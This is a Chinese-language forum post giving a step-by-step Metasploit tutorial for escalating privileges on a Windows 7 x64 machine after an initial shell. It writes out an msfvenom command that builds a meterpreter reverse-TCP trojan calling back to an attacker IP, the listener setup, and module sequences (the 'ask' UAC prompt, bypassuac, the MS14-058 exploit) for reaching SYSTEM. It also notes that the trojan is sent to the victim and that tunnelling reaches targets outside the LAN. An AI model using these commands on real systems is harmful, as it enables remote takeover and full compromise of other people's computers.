电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 2739 人浏览分享

针对win7x64 getshell后的提权操作

[复制链接]
2739 0
本帖最后由 zhaorong 于 2021-1-9 17:29 编辑

1.

刚和对象分手,吃完一碗泡面,就来和各位表哥们吹牛皮了,因为表哥们比对象重要哈哈哈哈;
别喷弟弟,由于实验实在本地进行,所以需要各位看官搭建环境。

2.

实验材料|:
                1.win7x64虚拟机一台
                2.kali一台
                3.接下来全靠吹牛皮

3.

  在我们拿到一个低权限的shell之后,我们需要提权,所以此篇文章就是针对这种情况的屁话不多
搭建好两台虚拟机之后就可以开始了。
3.1直接提权
我们首先需要制作一个马,先查看kali的ip,我这里是192.168.199.129

222214g9i3a9azgxi99kal.png

使用msfVENOM制作一个马,使用刚刚得到的ip,输入命令
msfvenom -a x64 --platform windows -p windows/x64/meterpreter_reverse_tcp lhost=192.168.199.129
lport=4444 -f exe x> shell.exe  

我解读一下使用msfvenom,制作x64位的win木马,使用windows/x64/meterpreter_reverse_tcp模块
监听主机为192.168.199.129,监听端口为4444.输出格式为exe可执行文件
输出名字为shell.exe,各位表哥看着输入命令
可以看到木马制作成功,接下来就是发送给靶机运行即可。

223502uq3hsh32vvssvgpi.png

注:
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序
并在目标机上执行,在本地监听上线4

使用msfcosole,命令
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.199.129
set lport 4444
exploit

30.png

可以看到成功监听。接下来靶机运行之前生成的木马即可拿到shell

29.png

已经可以看到sessions了,成功拿到shell,但是此时我们仅仅只是一个管理员权限 我们当然需要system权限

28.png

3.1.1
此时进入我们的exploit/windows/local/ask来提权,
输入命令use exploit/windows/local/ask进入该模块,此时只有一个sessions id为1

20.png

使用命令 set session 1
set filename qq.exe
exploit

(此时uac会在win7弹出一个窗口,我们选择是)

204736qvpqeppvttxe5qhp.png

即可看到成功获取system,此时我们进入shell 输入whoami 成功拿到system权限
这种提权方式是提高程序运行级别来提高权限。

19.png

注意:以上过程需要kali和win7处在同一个局域网中如果不在一个局域网
就需要内网穿透内网穿透简单来说就是将
内网外网通过natapp隧道打通,让内网的数据让外网可以获取

3.1.2
绕过uac提权
我们需要使用use exploit/windows/local/bypassuac模块来绕过uac策略
使用background返回到msf
命令:background
          use exploit/windows/local/bypassuac
          sessions
          set session 6
          exploit即可成功

18.png

输入sessions即可看到重新生成了许多session,此时我们只需要选择一个session进入会话getsystem即可。

17.png

这种提权方法比第一种更好,没有与用户交互的过程,当用户有
一定安全基础时第一种方法可能会失效
3.1.3
使用提权漏洞进行提权,先讲之前的session全部清空
留下一个admin权限的session

6.png

因为windows本地提权漏洞挺多的,所以我选择一个来举例子,其实都可以去试一下
首先进入exploit/windows/local/ms14_058_track_popup_menu模块
输入命令set session 1
             exploit
即可执行直接获取system的session

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.